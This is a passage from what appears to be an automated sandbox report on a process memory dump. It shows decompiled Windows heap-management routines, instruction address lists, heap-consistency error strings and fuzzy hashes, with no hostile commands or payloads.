										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E02A023E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}

0x02a144a1
0x02a144a3
0x02a144a7
0x02a144ac
0x02a144af
0x02a144b2
0x02a144b9
0x02a144bc
0x02a147f2
0x02a147f2
0x02a147f8
0x02a147fc
0x02a147fe
0x02a14804
0x02a14805
0x02a14805
0x02a1480c
0x02a14810
0x02a14812
0x02a14812
0x02a14812
0x02a14822
0x02a14822
0x02a14827
0x02a14827
0x00000000
0x02a14827
0x02a144c4
0x02a144d3
0x02a144d9
0x02a144dc
0x02a144de
0x02a144e0
0x02a14560
0x02a14520
0x02a14522
0x02a14525
0x02a14528
0x02a1452b
0x02a1452e
0x02a14530
0x02a14697
0x02a1469d
0x02a146a1
0x02a146c0
0x02a146c5
0x02a146a3
0x02a146b8
0x02a146bd
0x02a146cb
0x02a146d4
0x02a14677
0x02a14677
0x02a14679
0x02a1467c
0x02a1468a
0x02a14690
0x02a14690
0x02a147f1
0x02a147f1
0x02a147f1
0x00000000
0x02a147f1
0x02a14536
0x02a14539
0x02a1453c
0x02a14636
0x02a1463c
0x02a14640
0x02a1465f
0x02a14664
0x02a14642
0x02a14657
0x02a1465c
0x02a14670
0x00000000
0x02a14542
0x02a14542
0x02a14546
0x02a14548
0x02a1454b
0x02a14555
0x02a1455b
0x02a1455b
0x02a1455b
0x02a1455d
0x02a1455d
0x02a1455d
0x00000000
0x02a1455d
0x02a1453c
0x02a14579
0x02a1457c
0x02a14587
0x02a14589
0x02a14591
0x02a14592
0x02a14597
0x02a14598
0x02a145a1
0x02a145ab
0x02a145ab
0x02a145a1
0x02a145ae
0x02a145b4
0x02a145b9
0x02a145bd
0x02a14759
0x02a14759
0x02a1475f
0x02a14761
0x02a14763
0x02a14765
0x02a14768
0x02a1476b
0x02a1476d
0x02a1479c
0x02a1479c
0x02a1479f
0x02a147a2
0x02a147a4
0x02a14830
0x02a14833
0x02a14879
0x02a1487d
0x02a148f1
0x02a148f3
0x02a148f3
0x00000000
0x02a148f3
0x02a1487f
0x02a14885
0x02a14887
0x02a148a8
0x02a148a8
0x02a148ae
0x02a148b0
0x02a148dc
0x02a148dc
0x02a148dc
0x02a148dc
0x02a148ec
0x00000000
0x02a148ec
0x02a148b2
0x02a148bc
0x02a148be
0x02a148c1
0x00000000
0x00000000
0x00000000
0x00000000
0x02a148c3
0x02a148c3
0x02a148c6
0x02a148c9
0x02a148cc
0x02a148d1
0x02a148d4
0x00000000
0x00000000
0x02a148d6
0x02a148d7
0x02a148da
0x00000000
0x00000000
0x00000000
0x02a148da
0x02a1494f
0x02a14955
0x02a14959
0x02a14978
0x02a1497d
0x02a1495b
0x02a14970
0x02a14975
0x02a14986
0x02a14987
0x02a1498a
0x02a1498d
0x02a14997
0x02a147ef
0x02a147ef
0x02a147ef
0x00000000
0x02a147ef
0x02a14890
0x02a14890
0x02a14891
0x02a14891
0x02a14894
0x02a14897
0x02a1489d
0x02a148a0
0x00000000
0x00000000
0x02a148a2
0x02a148a3
0x02a148a6
0x00000000
0x00000000
0x00000000
0x02a148a6
0x02a148fb
0x02a14901
0x02a14905
0x02a14924
0x02a14929
0x02a14907
0x02a1491c
0x02a14921
0x02a1492f
0x02a14935
0x02a14936
0x02a14939
0x02a14942
0x00000000
0x02a14947
0x02a14835
0x02a1483b
0x02a1483f
0x02a1485e
0x02a14863
0x02a14841
0x02a14856
0x02a1485b
0x02a14869
0x02a1486c
0x02a1486f
0x02a147e7
0x02a147e7
0x00000000
0x02a147ec
0x02a147aa
0x02a147b0
0x02a147b4
0x02a147d3
0x02a147d8
0x02a147b6
0x02a147cb
0x02a147d0
0x02a147de
0x02a147df
0x02a147e2
0x00000000
0x00000000
0x00000000
0x00000000
0x02a1476f
0x02a1476f
0x02a14778
0x02a14785
0x02a14787
0x02a1478c
0x02a1478e
0x00000000
0x00000000
0x02a14790
0x02a14792
0x02a14794
0x00000000
0x00000000
0x02a14796
0x02a14799
0x00000000
0x02a14799
0x00000000
0x02a145c3
0x02a145c3
0x02a145c7
0x02a145c7
0x02a145ca
0x02a145cf
0x02a145d3
0x02a145df
0x02a145e4
0x02a145e6
0x02a145e8
0x02a145ed
0x02a145ed
0x02a145f2
0x02a145f2
0x02a145f7
0x02a145fc
0x02a14602
0x02a14606
0x02a14609
0x02a1460f
0x02a146de
0x02a146e3
0x02a146e5
0x02a146ec
0x02a146ee
0x02a146f6
0x02a146f6
0x02a146f6
0x02a146f6
0x02a146ec
0x02a14615
0x02a14615
0x02a1461d
0x02a1462e
0x02a1462e
0x02a1461d
0x02a1460f
0x02a14609
0x02a146fd
0x00000000
0x00000000
0x02a14710
0x02a1471a
0x02a14720
0x02a14720
0x02a14722
0x02a1472c
0x00000000
0x02a1472e
0x02a1472e
0x00000000
0x02a1472e
0x02a1472c
0x02a14738
0x02a1473c
0x02a1474b
0x02a14751
0x02a14751
0x00000000
0x02a1473c
0x02a148f4
0x02a148f4
0x00000000
0x02a148f4

Strings

HEAP: , xrefs: 02A1465F, 02A146C0, 02A147D3, 02A1485E, 02A14924, 02A14978
Non-Dedicated free list element %p is out of order, xrefs: 02A1466B
Pseudo Tag %04x size incorrect (%Ix != %Ix) %p, xrefs: 02A1493D
Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 02A147E2
Tag %04x (%ws) size incorrect (%Ix != %Ix) %p, xrefs: 02A14992
Total size of free blocks in arena (%Id) does not match number total in heap header (%Id), xrefs: 02A1486F
HEAP[%wZ]: , xrefs: 02A14652, 02A146B3, 02A147C6, 02A14851, 02A14917, 02A1496B
dedicated (%04Ix) free list element %p is marked busy, xrefs: 02A146CF

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
API String ID: 0-1357697941
Opcode ID: f55f19e5e182569e438ad37c0d511cbe2ff4e5706e1d5b69be0cbbe65b532568
Instruction ID: d92f0d029b9804705f5d9680a1559d17752d834163efe743f456a7104f46f7d5
Opcode Fuzzy Hash: f55f19e5e182569e438ad37c0d511cbe2ff4e5706e1d5b69be0cbbe65b532568
Instruction Fuzzy Hash: DAF12231600685EFDB25CF6CC494BAAB7F6FF89728F148069E4469B681CB34A985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0297A309, Relevance: 9.4, Strings: 7, Instructions: 687
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E0297A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x2a48a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E0297A830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E0297DF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E02959373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E0295A9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x2a48748 - 1;
						if( *0x2a48748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E0295B150();
								} else {
									E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E0295B150();
								__eflags =  *0x2a47bc8;
								if( *0x2a47bc8 == 0) {
									__eflags = 1;
									E02A12073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x2a48748 - 1;
							if( *0x2a48748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E0298174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E02977D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E02A114FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E02959373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E02959819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x2a48748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E0295B150();
											} else {
												E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E0295B150();
											_pop(_t491);
											__eflags =  *0x2a47bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E02A12073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E02A1A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E0297A830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E02977D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E02977D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E02A11411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E02977D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E02977D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x2a48748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E0295B150();
							} else {
								E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E0295B150();
							__eflags =  *0x2a47bc8;
							if( *0x2a47bc8 == 0) {
								__eflags = 0;
								E02A12073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x2a48748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E0295B150();
												} else {
													E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E0295B150();
												__eflags =  *0x2a47bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E02A12073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E02A1A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E0297A830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E0297B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E0297A830(_t553, _v64, _v24);
								_t286 = E02977D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E02977D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E02A11411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E02977D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E02977D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E02A11411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E0298174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E0297B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E02977D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E02A114FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E029799BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E0297A830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E0298ABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}

0x0297a309
0x0297a316
0x0297a319
0x0297a31d
0x0297a32d
0x0297a331
0x029c1e0d
0x029c1e10
0x0297a3cb
0x0297a3cb
0x0297a3bd
0x0297a3c3
0x0297a3c3
0x0297a33a
0x029c1e17
0x029c1e1b
0x029c1e1d
0x029c1e2f
0x029c1e34
0x029c1e36
0x029c1e3c
0x029c1e3c
0x029c1e3c
0x029c1e3c
0x029c1e36
0x029c1e42
0x029c1e45
0x029c1e47
0x0297a3f8
0x0297a3f8
0x0297a3fb
0x0297a3fd
0x029c1e50
0x0297a403
0x0297a411
0x0297a411
0x0297a411
0x0297a41e
0x0297a420
0x0297a424
0x0297a427
0x0297a7c9
0x0297a7cd
0x0297a7d2
0x0297a7d9
0x0297a7e0
0x0297a7e3
0x0297a7ed
0x0297a7f3
0x0297a7f9
0x0297a7ff
0x0297a802
0x0297a807
0x0297a809
0x0297a809
0x0297a809
0x0297a80f
0x0297a80f
0x0297a812
0x0297a81c
0x0297a821
0x0297a824
0x0297a42d
0x0297a42d
0x0297a42d
0x0297a42d
0x0297a42d
0x0297a436
0x0297a43a
0x0297a609
0x0297a60d
0x0297a612
0x0297a616
0x0297a61a
0x029c1e57
0x029c1e59
0x00000000
0x00000000
0x029c1e5f
0x0297a620
0x0297a627
0x029c1e64
0x029c1e66
0x029c1e6c
0x029c1e72
0x029c1e76
0x029c1e95
0x029c1e9a
0x029c1e78
0x029c1e8d
0x029c1e92
0x029c1ea0
0x029c1ea5
0x029c1eaa
0x029c1eb2
0x029c1eb6
0x029c1eb9
0x029c1eb9
0x029c1ebe
0x029c1ec2
0x029c1ec2
0x029c1e66
0x0297a62d
0x0297a633
0x0297a636
0x0297a63a
0x0297a63c
0x0297a640
0x0297a642
0x0297a644
0x0297a644
0x0297a644
0x0297a64d
0x0297a64d
0x0297a651
0x0297a655
0x029c1eca
0x029c1ed1
0x00000000
0x00000000
0x029c1ed7
0x00000000
0x0297a65b
0x0297a669
0x0297a66e
0x0297a670
0x00000000
0x00000000
0x0297a676
0x0297a67b
0x0297a680
0x0297a682
0x029c1f1a
0x0297a688
0x0297a688
0x0297a688
0x0297a68a
0x0297a68d
0x029c1f24
0x029c1f2a
0x029c1f31
0x029c1f43
0x029c1f43
0x029c1f31
0x0297a693
0x0297a697
0x0297a69d
0x0297a6a0
0x0297a6a6
0x0297a6a8
0x0297a6a8
0x0297a6a8
0x0297a6a8
0x0297a6b2
0x0297a6b7
0x0297a6c1
0x0297a6c6
0x0297a6d2
0x0297a6d9
0x0297a6e3
0x0297a6e6
0x0297a6eb
0x0297a6ed
0x0297a6ed
0x0297a6ed
0x0297a6ed
0x0297a6f3
0x0297a6f8
0x0297a702
0x0297a70a
0x0297a70e
0x0297a71a
0x0297a71e
0x029c1fcb
0x029c1fcf
0x029c1fdd
0x029c1fe3
0x029c1fe3
0x0297a724
0x0297a728
0x0297a72a
0x0297a72d
0x0297a737
0x0297a73a
0x0297a73c
0x0297a742
0x0297a748
0x029c1f4d
0x029c1f50
0x029c1f56
0x029c1f5c
